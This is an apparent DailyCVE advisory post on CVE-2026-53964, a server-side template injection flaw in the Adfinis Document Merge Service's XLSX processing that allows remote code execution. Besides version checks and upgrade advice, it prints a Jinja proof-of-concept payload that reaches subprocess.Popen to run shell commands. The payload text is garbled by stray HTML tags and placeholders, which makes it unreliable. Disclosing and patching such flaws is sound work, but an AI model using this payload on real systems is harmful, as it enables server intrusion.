Document Merge Service, Server-Side Template Injection (SSTI) RCE, CVE-2026-53964 (High Severity) -DC-Aug2026-1663

Listen to this Post

Vulnerability

CVE-2026-53964 is a high-severity vulnerability identified in the Adfinis Document Merge Service. This security flaw enables a Remote Code Execution (RCE) attack through a Server-Side Template Injection (SSTI) vulnerability.
The core of the issue lies in how the application processes XLSX templates. When a user uploads an XLSX file to be used as a template for document merging, the service utilizes the `xltpl` library to handle the rendering process. This library employs a Jinja templating environment for processing. Critically, this environment is not properly sandboxed, allowing an attacker to inject and execute arbitrary template code.
An attacker can exploit this by crafting a malicious XLSX template that contains Jinja syntax designed to execute system commands. When this template is uploaded and processed by the Document Merge Service, the injected code is executed on the server. The code runs with the privileges of the `document-merge-server` user, which has the UID 901. While this is not root access, it still provides the attacker with significant control over the containerized environment, potentially allowing them to read sensitive files, modify data, or use the server as a pivot point for further attacks.
The vulnerability is specific to XLSX templates; other template formats are not affected. The issue has been patched in version 9.1.0 of the software.

DailyCVE Form:

Platform: adfinis document-merge-service
Version: < 9.1.0
Vulnerability : RCE via SSTI
Severity: High
date: 2026-08-19

Prediction: Already Patched (v9.1.0)

What Undercode Say:

Analytics and technical details for system administrators and security teams.

Commands to Check Version:

Check the version of the installed package
pip show document-merge-service | grep Version
Alternatively, check the version in a requirements.txt file
grep document-merge-service requirements.txt

Command to Check for Vulnerable Template Processing:

To identify if the system is processing XLSX templates, you can search for relevant file extensions in the application’s data directory.

find /path/to/document-merge-service/data -name ".xlsx"

Exploit: (Educational Purposes!)

The following proof-of-concept demonstrates how an attacker could exploit this vulnerability. This is for educational purposes only.
An attacker can create an XLSX file with a Jinja template that executes system commands. The following payload can be inserted into a template field within the XLSX file:

{% if PLACEHOLDER.<strong>class</strong>.<strong>mro</strong>[bash].<strong>subclasses</strong>()[bash] %}
ls -a: {{ PLACEHOLDER.<strong>class</strong>.<strong>mro</strong>[bash].<strong>subclasses</strong>()[202]("ls -a", shell=True, stdout=-1).communicate()[bash].strip() }}
whoami: {{ PLACEHOLDER.<strong>class</strong>.<strong>mro</strong>[bash].<strong>subclasses</strong>()[202]("whoami", shell=True, stdout=-1).communicate()[bash].strip() }}
uname -a: {{ PLACEHOLDER.<strong>class</strong>.<strong>mro</strong>[bash].<strong>subclasses</strong>()[202]("uname -a", shell=True, stdout=-1).communicate()[bash].strip() }}
{% endif %}

Note: The index `202` might vary. An attacker would first need to enumerate the available subclasses to find the correct index for subprocess.Popen.

Protection:

The primary and most effective protection against CVE-2026-53964 is to upgrade to version 9.1.0 or later of the document-merge-service.
If an immediate upgrade is not possible, a temporary workaround is to disable the upload and usage of XLSX templates entirely.

Impact

Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the server. The code runs as the `document-merge-server` user (UID 901), granting the attacker considerable control over the container. This can lead to:
Data Breach: The attacker can read any files accessible to the `document-merge-server` user, potentially including sensitive configuration files, application data, and other documents.
System Compromise: The attacker can modify or delete files, install malware, or use the compromised container as a launchpad for attacks against other internal systems.
Service Disruption: The attacker could crash the service or make it unavailable, leading to a denial of service.
Privilege Escalation: While the initial access is with a non-root user, the attacker may be able to exploit other vulnerabilities to escalate privileges within the container or the host system.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top